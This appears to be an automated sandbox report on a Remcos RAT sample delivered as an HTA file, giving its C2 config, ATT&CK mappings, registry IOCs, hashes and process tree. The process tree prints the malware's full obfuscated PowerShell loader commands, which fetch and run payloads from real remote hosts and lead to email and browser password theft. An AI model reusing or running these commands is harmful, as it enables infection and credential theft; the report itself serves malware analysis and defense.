remcos | eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9

Analysis

max time kernel
148s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethebestthingstobesuccessfullygetbackwithentiretime.hta
Size

15KB
MD5

3ad24c21ca8cfdc1f7ea80d990a58cd1
SHA1

6e2d56eb9085869945b192c74874758ebdf033f9
SHA256

eb991c96fa1503bfb9a160baa4c84bcef7a53287a064e7bcb21c83e989f1ffc9
SHA512

71a8ba67fc2d15c7e420e1b8ca91a6445292b88e4db35517944e2671977e00418c97f963c1df8b9b34fc2a6912a6d2103f6587a9f7ce25fb4d48728c156f65c2
SSDEEP

48:3v6cylbcrSlb4zg9HLzIr5fcpy8veDYRjNx9bPyx6qLchrc7Qw4OllAc1G:frzg9rzYfEPG4jdPyoN

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

198.46.178.132:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-RWD64Z
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2096-108-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1040-105-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2940-107-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/2096-108-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1040-105-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
16	2196	powershell.exe
19	3228	powershell.exe
20	3228	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2196	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3228	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3228 set thread context of 4004	3228	powershell.exe	94
PID 4004 set thread context of 1040	4004	CasPol.exe	98
PID 4004 set thread context of 2096	4004	CasPol.exe	99
PID 4004 set thread context of 2940	4004	CasPol.exe	100

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2196	powershell.exe
2196	powershell.exe
3228	powershell.exe
3228	powershell.exe
1040	CasPol.exe
1040	CasPol.exe
2940	CasPol.exe
2940	CasPol.exe
1040	CasPol.exe
1040	CasPol.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4004	CasPol.exe
4004	CasPol.exe
4004	CasPol.exe
4004	CasPol.exe
4004	CasPol.exe
4004	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	3228	powershell.exe
Token: SeDebugPrivilege	2940	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4004	CasPol.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 1056 wrote to memory of 2240	1056	mshta.exe	85
PID 1056 wrote to memory of 2240	1056	mshta.exe	85
PID 1056 wrote to memory of 2240	1056	mshta.exe	85
PID 2240 wrote to memory of 2196	2240	cmd.exe	88
PID 2240 wrote to memory of 2196	2240	cmd.exe	88
PID 2240 wrote to memory of 2196	2240	cmd.exe	88
PID 2196 wrote to memory of 1104	2196	powershell.exe	89
PID 2196 wrote to memory of 1104	2196	powershell.exe	89
PID 2196 wrote to memory of 1104	2196	powershell.exe	89
PID 1104 wrote to memory of 3548	1104	csc.exe	90
PID 1104 wrote to memory of 3548	1104	csc.exe	90
PID 1104 wrote to memory of 3548	1104	csc.exe	90
PID 2196 wrote to memory of 4120	2196	powershell.exe	91
PID 2196 wrote to memory of 4120	2196	powershell.exe	91
PID 2196 wrote to memory of 4120	2196	powershell.exe	91
PID 4120 wrote to memory of 3228	4120	WScript.exe	92
PID 4120 wrote to memory of 3228	4120	WScript.exe	92
PID 4120 wrote to memory of 3228	4120	WScript.exe	92
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 3228 wrote to memory of 4004	3228	powershell.exe	94
PID 4004 wrote to memory of 4104	4004	CasPol.exe	95
PID 4004 wrote to memory of 4104	4004	CasPol.exe	95
PID 4004 wrote to memory of 4104	4004	CasPol.exe	95
PID 4004 wrote to memory of 1364	4004	CasPol.exe	96
PID 4004 wrote to memory of 1364	4004	CasPol.exe	96
PID 4004 wrote to memory of 1364	4004	CasPol.exe	96
PID 4004 wrote to memory of 2216	4004	CasPol.exe	97
PID 4004 wrote to memory of 2216	4004	CasPol.exe	97
PID 4004 wrote to memory of 2216	4004	CasPol.exe	97
PID 4004 wrote to memory of 1040	4004	CasPol.exe	98
PID 4004 wrote to memory of 1040	4004	CasPol.exe	98
PID 4004 wrote to memory of 1040	4004	CasPol.exe	98
PID 4004 wrote to memory of 1040	4004	CasPol.exe	98
PID 4004 wrote to memory of 2096	4004	CasPol.exe	99
PID 4004 wrote to memory of 2096	4004	CasPol.exe	99
PID 4004 wrote to memory of 2096	4004	CasPol.exe	99
PID 4004 wrote to memory of 2096	4004	CasPol.exe	99
PID 4004 wrote to memory of 2940	4004	CasPol.exe	100
PID 4004 wrote to memory of 2940	4004	CasPol.exe	100
PID 4004 wrote to memory of 2940	4004	CasPol.exe	100
PID 4004 wrote to memory of 2940	4004	CasPol.exe	100

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingstobesuccessfullygetbackwithentiretime.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwerSHELL -Ex byPass -NOP -W 1 -C dEviceCrEDENTiALdepLoyMENt.EXe ; InVOkE-ExPReSsION($(inVOkE-exPResSioN('[SySTem.TeXT.ENCoDING]'+[chAR]58+[cHar]0X3A+'utF8.gETstRing([SYSTem.coNVERT]'+[CHar]0X3a+[cHAr]0x3A+'FROMbAse64STRIng('+[chAR]0X22+'JHZGbWdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlcmRFRmlOaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnlvUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaVUZITUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcVZ5enFxb21KLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ6dHpsR0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsRVhFV1NqZ1VBIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXellXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Rm1nYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguNy43Mi8xMjAvc2VldGhlYmVzdHRoaW5nc2ZvcmVudGlyZXRpbWVnaXZlbm1lYmVzdGZvcm1lLmdJRiIsIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZm9yZW50aXJldGltZWdpdmVubWViZXN0Zm9ybS52YnMiLDAsMCk7c3RhcnQtU0xlRVAoMyk7SU52b2tFLWVYcFJlc3NpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JlbnRpcmV0aW1lZ2l2ZW5tZWJlc3Rmb3JtLnZicyI='+[cHar]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x1a2rsks\x1a2rsks.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B77.tmp" "c:\Users\Admin\AppData\Local\Temp\x1a2rsks\CSC831A3D672E98497082A330393ADD26F5.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3548
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4120
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAHMAZwBuAGkAaAB0AHQAcwBlAGIAawBjAGEAYgB0AGUAZwBvAHQAeQBhAHcAcgBlAHQAdABlAGIALwAwADIAMQAvADIANwAuADcALgA4ADYAMQAuADQAMAAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3228
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\okjkowpamxupavnqpilq"
        7⤵
        
        PID:4104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\okjkowpamxupavnqpilq"
        7⤵
        
        PID:1364
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\okjkowpamxupavnqpilq"
        7⤵
        
        PID:2216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\okjkowpamxupavnqpilq"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1040
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qepdhpzuhfmccjbuhtfszxk"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\aycvihsvvnehmpxyqeslccfuvc"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
4928c1d7ec1a3e48b40617cdb0738432

SHA1
316c44df7e6105ac3bca25ccbc16e663b9513215

SHA256
205e6ab4302af73fff45f2d33e8334477b0c8a40fc96adcd590c15ca75359b09

SHA512
4fcad4170b5277ff967df6f0928a8b438a62c348ef7ef871c4cd1a6f5f56a2d9c8b4cfe41746f62bdc2f2f0d5908bd74c4bf875e26a9aacc40394b11c3235bb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
f562702cb485b1e92365347d3dd5ca72

SHA1
a20d2b08f6f06479c8cb27415aa83381dc9978cd

SHA256
2f7017b535301c9387e3de0dcde88f749abcfecc958e2b6cc354ae2d8d474d97

SHA512
78a9bf2dc0355fb6b6bae0e2bb3bf3bda3cfba88c4771c14bc61c8c3a06600d482d761cd1e07255769f5a98944a10d9f275ed743465ca86bcd0c88e9770ad284

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8B77.tmp

Filesize
1KB

MD5
e4c8f0df674d40d3765aa02360cef003

SHA1
2aaba5a4103d823e8b12c8ec1d3d51bedb21457b

SHA256
b7cd756e73a5e930593064335cd6ceff42fa7d917352a0dbecc963d3237fadc0

SHA512
1dd4e16142aa784a038f4391c0e129af4e04a45abfa231f44611804914c174f5c3d1d43e6a1fa294cb714fb9044e0bbc847e313387ea62fc2f24f1d0c68987a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hhe3ts4.eal.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\okjkowpamxupavnqpilq

Filesize
4KB

MD5
02c5a73ece01e8ea0cdb22bbcaa7012e

SHA1
067a8efddcbb2de48472d1324f3875ed72e9c93e

SHA256
60925b0bda985721792016b14c7a504e67cae7c87a15a274cacd8ad520dc0038

SHA512
02bc30537773043d8f16a5f7b8150fb62ef0e4c35baace39c9793947d47e9f8260a122ada8e4ee7d48e4ae4552015704da44bac5b50bc4cb1f52774301f79b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\x1a2rsks\x1a2rsks.dll

Filesize
3KB

MD5
9b697a67f20e90a4e0f5f01668e37fc1

SHA1
4d33463e665136be148ac7502a1a72e0a2f5bdf6

SHA256
2a2e706c4cdc783a3b7989368f32d9a6327ff59c28f99b5ea838526de777e6bf

SHA512
e0626b6a22cf6bd29a08241a91fb9b476a08fc6bb8d790a9d73091f4714222ef32130da77ea3aa438032d6f10afc53a4bcf28af68b82b5d2671b0ec7bc5a36a9

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsforentiretimegivenmebestform.vbs

Filesize
229KB

MD5
88f23c1da68cf667cec4b361448b8367

SHA1
028988c872f4793172929f914e7c0dbb145397d8

SHA256
3b2b162a74ce403dff15fe96e5623cffdf3326e57949cdd1ecf5ffe9ad155bee

SHA512
97bfb73a8e0c81e8309dcbdf7b8bd4df826c1c18225c483a12929e1bec87332dcf3bd0f01d4ce9f981d63c685a40449b84a618ae5f9afe7b1ecbea05603fdbb5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x1a2rsks\CSC831A3D672E98497082A330393ADD26F5.TMP

Filesize
652B

MD5
0d983528241d12b82992db7cec2fab44

SHA1
0831aa50109312e4cf30d3c30a1b9b6964472ed8

SHA256
d157c84ee51ae5ba8778b952576fbd1e71d1c62dcd6bb99bebdc0bf2b4b7bd50

SHA512
f65380463d1d7296fd67a14647131f05f846a65d255fd55cf567db47f840d1fa920434e36ca055bb7dd8b2ec622fd400c40743649258c47531ef23fab1280470

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x1a2rsks\x1a2rsks.0.cs

Filesize
477B

MD5
788c3576e3dc8f95e6eef8576140abc7

SHA1
23441802614b7925dfb9a627dddf94345081369f

SHA256
eb34dc7736008d75241298fb305f6a59e599ae41a8f58a4eeddd3cef9a9f00d3

SHA512
7321860df913545e1bd998f21a941bc82f9fbb84b95b072c0c61d5eb906032b0ec22c8a49bbed2573faff923f4f4f8de45222bf40f1d07fd1092c4ff6dcb1678

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\x1a2rsks\x1a2rsks.cmdline

Filesize
369B

